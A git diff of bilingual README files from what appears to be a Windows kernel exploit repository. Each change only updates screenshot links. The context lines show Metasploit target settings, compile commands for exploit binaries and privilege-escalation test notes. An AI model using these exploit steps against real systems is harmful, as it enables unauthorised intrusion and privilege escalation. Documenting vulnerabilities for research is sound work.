diff --git a/CVE-2003-0352/README.md b/CVE-2003-0352/README.md index f531dd4..5100bd9 100644 --- a/CVE-2003-0352/README.md +++ b/CVE-2003-0352/README.md @@ -34,9 +34,9 @@ set RHOST 192.168.1.17 run ``` -![image-20200823200752021](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2003-0352_win2000_x86_msf.png) +![image-20200823200752021](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2003-0352_win2000_x86_msf.png) 查看系统信息 -![CVE-2003-0352_win2000_x86_msf2](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2003-0352_win2000_x86_msf2.png) +![CVE-2003-0352_win2000_x86_msf2](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2003-0352_win2000_x86_msf2.png) diff --git a/CVE-2003-0352/README_EN.md b/CVE-2003-0352/README_EN.md index c820c8a..cb2a754 100644 --- a/CVE-2003-0352/README_EN.md +++ b/CVE-2003-0352/README_EN.md @@ -34,9 +34,9 @@ set RHOST 192.168.1.17 run ``` -![image-20200823200752021](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2003-0352_win2000_x86_msf.png) +![image-20200823200752021](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2003-0352_win2000_x86_msf.png) View system information -![CVE-2003-0352_win2000_x86_msf2](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2003-0352_win2000_x86_msf2.png) +![CVE-2003-0352_win2000_x86_msf2](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2003-0352_win2000_x86_msf2.png) diff --git a/CVE-2008-1084/README.md b/CVE-2008-1084/README.md index 18d8ca9..7825cfc 100644 --- a/CVE-2008-1084/README.md +++ b/CVE-2008-1084/README.md @@ -22,7 +22,7 @@ 测试系统Windows Server 2003 SP2 x86 -![27](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2008-1084_win2003_x86.gif) +![27](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2008-1084_win2003_x86.gif) #### 分析文章 - https://github.com/lyshark/Windows-exploits/blob/master/Windows%20%E5%86%85%E6%A0%B8%E6%BC%8F%E6%B4%9E%20ms08025%20%E5%88%86%E6%9E%90.7z diff --git a/CVE-2008-1084/README_EN.md b/CVE-2008-1084/README_EN.md index 4116162..515230e 100644 --- a/CVE-2008-1084/README_EN.md +++ b/CVE-2008-1084/README_EN.md @@ -22,7 +22,7 @@ Unspecified vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2, S Test system Windows Server 2003 SP2 x86 -![27](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2008-1084_win2003_x86.gif) +![27](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2008-1084_win2003_x86.gif) #### Analyze - https://github.com/lyshark/Windows-exploits/blob/master/Windows%20%E5%86%85%E6%A0%B8%E6%BC%8F%E6%B4%9E%20ms08025%20%E5%88%86%E6%9E%90.7z diff --git a/CVE-2008-3464/README.md b/CVE-2008-3464/README.md index d24cfe4..2cb5b9c 100644 --- a/CVE-2008-3464/README.md +++ b/CVE-2008-3464/README.md @@ -20,7 +20,7 @@ 只找到可执行exe文件,测试系统Windows Server 2003 SP2 x86 -![26](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2008-3464_win2003_x86.gif) +![26](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2008-3464_win2003_x86.gif) #### 分析文章 - https://bbs.pediy.com/thread-74811.htm \ No newline at end of file diff --git a/CVE-2008-3464/README_EN.md b/CVE-2008-3464/README_EN.md index 9b2f3f8..69c8088 100644 --- a/CVE-2008-3464/README_EN.md +++ b/CVE-2008-3464/README_EN.md @@ -21,7 +21,7 @@ afd.sys in the Ancillary Function Driver (AFD) component in Microsoft Windows XP Only find Exe files, test systems Windows Server 2003 SP2 x86 -![26](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2008-3464_win2003_x86.gif) +![26](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2008-3464_win2003_x86.gif) #### Analyze - https://bbs.pediy.com/thread-74811.htm \ No newline at end of file diff --git a/CVE-2008-4037/README.md b/CVE-2008-4037/README.md index c195d3c..f4cd876 100644 --- a/CVE-2008-4037/README.md +++ b/CVE-2008-4037/README.md @@ -27,5 +27,5 @@ set SMBHOST 192.168.1.14 #目标IP run ``` -![image-20200823142846532](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2008-4037_win2003_x86_msf.png) +![image-20200823142846532](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2008-4037_win2003_x86_msf.png) diff --git a/CVE-2008-4037/README_EN.md b/CVE-2008-4037/README_EN.md index 7b7109a..9723964 100644 --- a/CVE-2008-4037/README_EN.md +++ b/CVE-2008-4037/README_EN.md @@ -28,5 +28,5 @@ set SMBHOST 192.168.1.14 #目标IP run ``` -![image-20200823142846532](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2008-4037_win2003_x86_msf.png) +![image-20200823142846532](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2008-4037_win2003_x86_msf.png) diff --git a/CVE-2008-4250/README.md b/CVE-2008-4250/README.md index 12a183b..ea93dff 100644 --- a/CVE-2008-4250/README.md +++ b/CVE-2008-4250/README.md @@ -29,7 +29,7 @@ set RHOST 192.168.1.14 run ``` -![image-20200823143331505](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2008-4250_win2003_x86_msf.png) +![image-20200823143331505](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2008-4250_win2003_x86_msf.png) #### 分析文章 - https://bbs.pediy.com/thread-251219.htm diff --git a/CVE-2008-4250/README_EN.md b/CVE-2008-4250/README_EN.md index 04d0f7e..2c60fee 100644 --- a/CVE-2008-4250/README_EN.md +++ b/CVE-2008-4250/README_EN.md @@ -30,7 +30,7 @@ set RHOST 192.168.1.14 run ``` -![image-20200823143331505](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2008-4250_win2003_x86_msf.png) +![image-20200823143331505](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2008-4250_win2003_x86_msf.png) #### Analyze - https://bbs.pediy.com/thread-251219.htm diff --git a/CVE-2009-2532/README.md b/CVE-2009-2532/README.md index 4e0b7e8..c61c263 100644 --- a/CVE-2009-2532/README.md +++ b/CVE-2009-2532/README.md @@ -24,7 +24,7 @@ set RHOSTS 192.168.1.13 #目标IP run ``` -![image-20200823134421895](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2009-2532_win2008_x86_msf.png) +![image-20200823134421895](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2009-2532_win2008_x86_msf.png) #### 分析文章 - https://www.giantbranch.cn/2017/08/26/Educatedscholar%E5%88%A9%E7%94%A8%E7%9A%84%E6%BC%8F%E6%B4%9Ems09-050%E5%88%86%E6%9E%90%E5%8F%8A%E5%85%B6%E5%88%A9%E7%94%A8%E7%9A%84shellcode%E5%88%86%E6%9E%90%E5%8F%8A%E4%B8%8Emsf%E5%88%A9%E7%94%A8%E5%AF%B9%E6%AF%94/ diff --git a/CVE-2009-2532/README_EN.md b/CVE-2009-2532/README_EN.md index a469618..e4a3c20 100644 --- a/CVE-2009-2532/README_EN.md +++ b/CVE-2009-2532/README_EN.md @@ -25,7 +25,7 @@ set RHOSTS 192.168.1.13 #目标IP run ``` -![image-20200823134421895](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2009-2532_win2008_x86_msf.png) +![image-20200823134421895](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2009-2532_win2008_x86_msf.png) #### Analyze - https://www.giantbranch.cn/2017/08/26/Educatedscholar%E5%88%A9%E7%94%A8%E7%9A%84%E6%BC%8F%E6%B4%9Ems09-050%E5%88%86%E6%9E%90%E5%8F%8A%E5%85%B6%E5%88%A9%E7%94%A8%E7%9A%84shellcode%E5%88%86%E6%9E%90%E5%8F%8A%E4%B8%8Emsf%E5%88%A9%E7%94%A8%E5%AF%B9%E6%AF%94/ diff --git a/CVE-2010-0233/README.md b/CVE-2010-0233/README.md index 785cb4d..20900e7 100644 --- a/CVE-2010-0233/README.md +++ b/CVE-2010-0233/README.md @@ -26,7 +26,7 @@ 测试系统Windows Server 2003 SP2 x86 -![25](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2010-0233_win2003_x86.gif) +![25](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2010-0233_win2003_x86.gif) > msf利用 @@ -40,8 +40,8 @@ run 可以看到当前权限是最低的 -![image-20200823123824229](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2010-0233_win2003_x86_msf.png) +![image-20200823123824229](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2010-0233_win2003_x86_msf.png) 然后执行命令提权 -![image-20200823123945054](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2010-0233_win2003_x86_msf2.png) \ No newline at end of file +![image-20200823123945054](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2010-0233_win2003_x86_msf2.png) \ No newline at end of file diff --git a/CVE-2010-0233/README_EN.md b/CVE-2010-0233/README_EN.md index 0af1911..a6602ee 100644 --- a/CVE-2010-0233/README_EN.md +++ b/CVE-2010-0233/README_EN.md @@ -27,7 +27,7 @@ CompilerEnvironment Test system Windows Server 2003 SP2 x86 -![25](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2010-0233_win2003_x86.gif) +![25](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2010-0233_win2003_x86.gif) > MSF utilization @@ -41,8 +41,8 @@ run You can see that the current permissions are the lowest. -![image-20200823123824229](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2010-0233_win2003_x86_msf.png) +![image-20200823123824229](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2010-0233_win2003_x86_msf.png) Then execute command rights -![image-20200823123945054](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2010-0233_win2003_x86_msf2.png) \ No newline at end of file +![image-20200823123945054](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2010-0233_win2003_x86_msf2.png) \ No newline at end of file diff --git a/CVE-2010-1897/README.md b/CVE-2010-1897/README.md index c6ef3df..c143060 100644 --- a/CVE-2010-1897/README.md +++ b/CVE-2010-1897/README.md @@ -22,5 +22,5 @@ win32k.sys中的Windows内核模式驱动程序无法正确验证伪句柄值 测试系统Windows Server 2003 SP2 x86 -![24](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2010-1897_win2003_x86.gif) +![24](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2010-1897_win2003_x86.gif) diff --git a/CVE-2010-1897/README_EN.md b/CVE-2010-1897/README_EN.md index 9ec9373..ca1deaf 100644 --- a/CVE-2010-1897/README_EN.md +++ b/CVE-2010-1897/README_EN.md @@ -23,5 +23,5 @@ The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP Test system Windows Server 2003 SP2 x86 -![24](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2010-1897_win2003_x86.gif) +![24](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2010-1897_win2003_x86.gif) diff --git a/CVE-2010-3338/README.md b/CVE-2010-3338/README.md index 19decbf..2c32f35 100644 --- a/CVE-2010-3338/README.md +++ b/CVE-2010-3338/README.md @@ -25,9 +25,9 @@ set SESSION 2 run ``` -![image-20200822234422637](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2010-3338_win2008_x86_msf.png) +![image-20200822234422637](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2010-3338_win2008_x86_msf.png) 然后就能提权成功了 -![image-20200822234608009](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2010-3338_win2008_x86_msf2.png) +![image-20200822234608009](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2010-3338_win2008_x86_msf2.png) diff --git a/CVE-2010-3338/README_EN.md b/CVE-2010-3338/README_EN.md index e12fdc7..1e36ba8 100644 --- a/CVE-2010-3338/README_EN.md +++ b/CVE-2010-3338/README_EN.md @@ -25,9 +25,9 @@ set SESSION 2 run ``` -![image-20200822234422637](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2010-3338_win2008_x86_msf.png) +![image-20200822234422637](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2010-3338_win2008_x86_msf.png) Then it will be successful. -![image-20200822234608009](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2010-3338_win2008_x86_msf2.png) +![image-20200822234608009](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2010-3338_win2008_x86_msf2.png) diff --git a/CVE-2011-1249/README.md b/CVE-2011-1249/README.md index 5c64ac6..100782a 100644 --- a/CVE-2011-1249/README.md +++ b/CVE-2011-1249/README.md @@ -29,7 +29,7 @@ i686-w64-mingw32-gcc CVE-2011-1249.c -o CVE-2011-1249.exe -lws2_32 测试系统Windows Server 2003 SP2 x86和Windows 7 SP1 x86都成功 -![23](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2011-1249_win2003_x86.gif) +![23](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2011-1249_win2003_x86.gif) #### 分析文章 - https://github.com/Madusanka99/OHTS/blob/master/IT16075504%20-OHTS%20Report.pdf \ No newline at end of file diff --git a/CVE-2011-1249/README_EN.md b/CVE-2011-1249/README_EN.md index f313bb3..2fef2bf 100644 --- a/CVE-2011-1249/README_EN.md +++ b/CVE-2011-1249/README_EN.md @@ -29,7 +29,7 @@ i686-w64-mingw32-gcc CVE-2011-1249.c -o CVE-2011-1249.exe -lws2_32 Test system Windows Server 2003 SP2 x86 and Windows 7 SP1 x86 Can use -![23](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2011-1249_win2003_x86.gif) +![23](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2011-1249_win2003_x86.gif) #### Analyze - https://github.com/Madusanka99/OHTS/blob/master/IT16075504%20-OHTS%20Report.pdf \ No newline at end of file diff --git a/CVE-2011-1974/README.md b/CVE-2011-1974/README.md index 8f1f370..16ef3d7 100644 --- a/CVE-2011-1974/README.md +++ b/CVE-2011-1974/README.md @@ -22,9 +22,9 @@ i686-w64-mingw32-gcc CVE-2011-1974.c -o CVE-2011-1974.exe -lws2_32 测试系统Windows Server 2003 SP2 x86,首先需要用管理员修改注册表和开启服务 -![image-20200822202222486](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2011-1974_win2003_x86.png) +![image-20200822202222486](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2011-1974_win2003_x86.png) 接着切回普通用户 -![22](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2011-1974_win2003_x86.gif) +![22](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2011-1974_win2003_x86.gif) diff --git a/CVE-2011-1974/README_EN.md b/CVE-2011-1974/README_EN.md index 2ff7066..4a45062 100644 --- a/CVE-2011-1974/README_EN.md +++ b/CVE-2011-1974/README_EN.md @@ -23,9 +23,9 @@ i686-w64-mingw32-gcc CVE-2011-1974.c -o CVE-2011-1974.exe -lws2_32 Test system Windows Server 2003 SP2 x86,First, you need to modify the registry and open service with an administrator. -![image-20200822202222486](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2011-1974_win2003_x86.png) +![image-20200822202222486](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2011-1974_win2003_x86.png) Then cut back to ordinary users -![22](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2011-1974_win2003_x86.gif) +![22](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2011-1974_win2003_x86.gif) diff --git a/CVE-2011-2005/README.md b/CVE-2011-2005/README.md index 31f9d40..8a5c472 100644 --- a/CVE-2011-2005/README.md +++ b/CVE-2011-2005/README.md @@ -16,7 +16,7 @@ 测试系统Windows Server 2003 SP2 x86 -![21](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2011-2005_win2003_x86.gif) +![21](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2011-2005_win2003_x86.gif) msf利用直接使用这个即可 diff --git a/CVE-2011-2005/README_EN.md b/CVE-2011-2005/README_EN.md index fc25d9f..11dc997 100644 --- a/CVE-2011-2005/README_EN.md +++ b/CVE-2011-2005/README_EN.md @@ -16,7 +16,7 @@ afd.sys in the Ancillary Function Driver in Microsoft Windows XP SP2 and SP3 and Test system Windows Server 2003 SP2 x86 -![21](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2011-2005_win2003_x86.gif) +![21](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2011-2005_win2003_x86.gif) MSF uses it directly to use this diff --git a/CVE-2012-0217/README.md b/CVE-2012-0217/README.md index 5a9fff8..0c0385c 100644 --- a/CVE-2012-0217/README.md +++ b/CVE-2012-0217/README.md @@ -23,5 +23,5 @@ 测试系统Windows Server 2008 R2 SP1 x64 -![20](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2012-0217_win2008_x64.gif) +![20](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2012-0217_win2008_x64.gif) diff --git a/CVE-2012-0217/README_EN.md b/CVE-2012-0217/README_EN.md index 344a2ef..25df314 100644 --- a/CVE-2012-0217/README_EN.md +++ b/CVE-2012-0217/README_EN.md @@ -24,5 +24,5 @@ CompilerEnvironment Test system Windows Server 2008 R2 SP1 x64 -![20](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2012-0217_win2008_x64.gif) +![20](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2012-0217_win2008_x64.gif) diff --git a/CVE-2013-1332/README.md b/CVE-2013-1332/README.md index df27681..a086c12 100644 --- a/CVE-2013-1332/README.md +++ b/CVE-2013-1332/README.md @@ -27,7 +27,7 @@ 测试系统Windows Server 2003 SP2 x86 -![19](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2013-1332_win2003_x86.gif) +![19](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2013-1332_win2003_x86.gif) #### 分析文章 - https://www.anquanke.com/vul/id/1045064 diff --git a/CVE-2013-1332/README_EN.md b/CVE-2013-1332/README_EN.md index 9243e1d..6934336 100644 --- a/CVE-2013-1332/README_EN.md +++ b/CVE-2013-1332/README_EN.md @@ -27,7 +27,7 @@ CompilerEnvironment Test system Windows Server 2003 SP2 x86 -![19](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2013-1332_win2003_x86.gif) +![19](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2013-1332_win2003_x86.gif) #### Analyze - https://www.anquanke.com/vul/id/1045064 diff --git a/CVE-2013-1345/README.md b/CVE-2013-1345/README.md index df5b4c7..7970ba9 100644 --- a/CVE-2013-1345/README.md +++ b/CVE-2013-1345/README.md @@ -31,15 +31,15 @@ set SESSION 2 #你上线机器的session run ``` -![image-20200822151416515](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2013-1345_win7_x86.png) +![image-20200822151416515](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2013-1345_win7_x86.png) Windows Sever 2003 SP2 x86 和Windows Sever 2003 R2 SP2 x86都测试成功,但是利用文件没有源码只有exe可执行文件 Windows Sever 2003 SP2 x86 动图如下 -![17](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2013-1345_win2003_x86.gif) +![17](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2013-1345_win2003_x86.gif) Windows Sever 2003 R2 SP2 x86 动图如下 -![18](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2013-1345_win2003_x86_2.gif) +![18](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2013-1345_win2003_x86_2.gif) diff --git a/CVE-2013-1345/README_EN.md b/CVE-2013-1345/README_EN.md index 7c4b233..5545c4c 100644 --- a/CVE-2013-1345/README_EN.md +++ b/CVE-2013-1345/README_EN.md @@ -31,15 +31,15 @@ set SESSION 2 #你上线机器的session run ``` -![image-20200822151416515](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2013-1345_win7_x86.png) +![image-20200822151416515](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2013-1345_win7_x86.png) Windows Server 2003 SP2 X86 and Windows Server 2003 R2 SP2 X86 are successful, but the file does not have the source code only exe executable Windows Sever 2003 SP2 x86 GIF -![17](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2013-1345_win2003_x86.gif) +![17](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2013-1345_win2003_x86.gif) Windows Sever 2003 R2 SP2 x86 GIF -![18](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2013-1345_win2003_x86_2.gif) +![18](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2013-1345_win2003_x86_2.gif) diff --git a/CVE-2014-1767/README.md b/CVE-2014-1767/README.md index 5572b14..1c7a46c 100644 --- a/CVE-2014-1767/README.md +++ b/CVE-2014-1767/README.md @@ -27,13 +27,13 @@ 测试系统Windows 7 SP1 x86 ,测试exe文件和py脚本都可以正常利用 -![16](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2014-1767_win7_x86.gif) +![16](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2014-1767_win7_x86.gif) > x64利用 测试系统Windows 7 SP1 x64 测试利用py脚本,exe文件有机率蓝屏 -![17](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2014-1767_win7_x64.gif) +![17](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2014-1767_win7_x64.gif) #### 分析文章 - https://xz.aliyun.com/t/6770 diff --git a/CVE-2014-1767/README_EN.md b/CVE-2014-1767/README_EN.md index 7a93a9f..ad43ea5 100644 --- a/CVE-2014-1767/README_EN.md +++ b/CVE-2014-1767/README_EN.md @@ -28,13 +28,13 @@ With the script is Python, there is also a compiled EXE version Test system Windows 7 SP1 x86 ,Test EXE files and py scripts can be used normally -![16](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2014-1767_win7_x86.gif) +![16](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2014-1767_win7_x86.gif) > x64 utilization Test system Windows 7 SP1 x64 Use the PY script, EXE file organically blue screen -![17](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2014-1767_win7_x64.gif) +![17](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2014-1767_win7_x64.gif) #### Analyze - https://xz.aliyun.com/t/6770 diff --git a/CVE-2014-4076/README.md b/CVE-2014-4076/README.md index 67ccf02..aa24b8e 100644 --- a/CVE-2014-4076/README.md +++ b/CVE-2014-4076/README.md @@ -20,7 +20,7 @@ i586-mingw32msvc-gcc CVE-2014-4076.c -o CVE-2014-4076.exe 测试机器Windows Server 2003 SP2 x86 -![16](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2014-4076_win2003_x86.gif) +![16](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2014-4076_win2003_x86.gif) #### 分析文章 diff --git a/CVE-2014-4076/README_EN.md b/CVE-2014-4076/README_EN.md index 8323587..a3d1b5a 100644 --- a/CVE-2014-4076/README_EN.md +++ b/CVE-2014-4076/README_EN.md @@ -21,7 +21,7 @@ i586-mingw32msvc-gcc CVE-2014-4076.c -o CVE-2014-4076.exe Test Machine Windows Server 2003 SP2 x86 -![16](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2014-4076_win2003_x86.gif) +![16](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2014-4076_win2003_x86.gif) #### Analyze diff --git a/CVE-2014-4113/README.md b/CVE-2014-4113/README.md index e4e5d05..08d52ee 100644 --- a/CVE-2014-4113/README.md +++ b/CVE-2014-4113/README.md @@ -32,13 +32,13 @@ 测试系统Windows 7 SP1 x86 -![14](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2014-4113_win7_x86.gif) +![14](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2014-4113_win7_x86.gif) > x64利用 测试系统Windows 7 SP1 x64 -![15](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2014-4113_win7_x64.gif) +![15](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2014-4113_win7_x64.gif) #### 分析文章 - https://xz.aliyun.com/t/4456 diff --git a/CVE-2014-4113/README_EN.md b/CVE-2014-4113/README_EN.md index 0b0bb83..eceba22 100644 --- a/CVE-2014-4113/README_EN.md +++ b/CVE-2014-4113/README_EN.md @@ -33,13 +33,13 @@ CompilerEnvironment Test system Windows 7 SP1 x86 -![14](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2014-4113_win7_x86.gif) +![14](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2014-4113_win7_x86.gif) > x64 utilization Test system Windows 7 SP1 x64 -![15](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2014-4113_win7_x64.gif) +![15](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2014-4113_win7_x64.gif) #### Analyze - https://xz.aliyun.com/t/4456 diff --git a/CVE-2015-0003/README.md b/CVE-2015-0003/README.md index 4542c62..663b957 100644 --- a/CVE-2015-0003/README.md +++ b/CVE-2015-0003/README.md @@ -30,7 +30,7 @@ 利用Windows 7 SP1 x86作为演示 -![10](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-0003_win7_x86.gif) +![10](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-0003_win7_x86.gif) > x64利用 @@ -40,7 +40,7 @@ 利用Windows Server 2008 R2 SP1 x64进行测试 -![11](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-0003_win2008_x64.gif) +![11](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-0003_win2008_x64.gif) #### 分析文章 - https://www.shuzhiduo.com/A/Vx5M1WrL5N/ diff --git a/CVE-2015-0003/README_EN.md b/CVE-2015-0003/README_EN.md index 615c8ff..ab4d003 100644 --- a/CVE-2015-0003/README_EN.md +++ b/CVE-2015-0003/README_EN.md @@ -30,7 +30,7 @@ CompilerEnvironment Use Windows 7 SP1 X86 as a demonstration -![10](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-0003_win7_x86.gif) +![10](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-0003_win7_x86.gif) > X64 utilization @@ -40,7 +40,7 @@ CompilerEnvironment Testing with Windows Server 2008 R2 SP1 X64 -![11](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-0003_win2008_x64.gif) +![11](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-0003_win2008_x64.gif) #### Analyze - https://www.shuzhiduo.com/A/Vx5M1WrL5N/ diff --git a/CVE-2015-0057/README.md b/CVE-2015-0057/README.md index c1f2f54..e7cf172 100644 --- a/CVE-2015-0057/README.md +++ b/CVE-2015-0057/README.md @@ -31,7 +31,7 @@ 对Windows 7 SP1 x86进行测试 -![2](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-0057_win7_sp1_x86.gif) +![2](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-0057_win7_sp1_x86.gif) #### 分析文章 - https://xz.aliyun.com/t/4549 diff --git a/CVE-2015-0057/README_EN.md b/CVE-2015-0057/README_EN.md index be558b3..52bf069 100644 --- a/CVE-2015-0057/README_EN.md +++ b/CVE-2015-0057/README_EN.md @@ -32,7 +32,7 @@ The test uses the compiled EXP `CVE-2015-0057_x86` and `CVE-2015-0057_x64` found Test Windows 7 SP1 X86 -![2](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-0057_win7_sp1_x86.gif) +![2](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-0057_win7_sp1_x86.gif) #### Analyze - https://xz.aliyun.com/t/4549 diff --git a/CVE-2015-1701/README.md b/CVE-2015-1701/README.md index 86ab246..77a76f2 100644 --- a/CVE-2015-1701/README.md +++ b/CVE-2015-1701/README.md @@ -24,10 +24,10 @@ 测试机器 Windows 7 SP1 x86 -![12](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-1701_win7_x86.gif) +![12](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-1701_win7_x86.gif) > x64利用 测试使用Windows Server 2008 R2 SP1 x64 -![13](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-1701_win2008_x64.gif) \ No newline at end of file +![13](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-1701_win2008_x64.gif) \ No newline at end of file diff --git a/CVE-2015-1701/README_EN.md b/CVE-2015-1701/README_EN.md index daa6ff6..e89d4a8 100644 --- a/CVE-2015-1701/README_EN.md +++ b/CVE-2015-1701/README_EN.md @@ -24,10 +24,10 @@ CompilerEnvironment Test Machine Windows 7 SP1 x86 -![12](https://raw.github.com/Ascotbe/Random-img/master/Kernelhub/CVE-2015-1701_win7_x86.gif) +![12](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2015-1701_win7_x86.gif) > x64 utilization Test Machine Windows Server 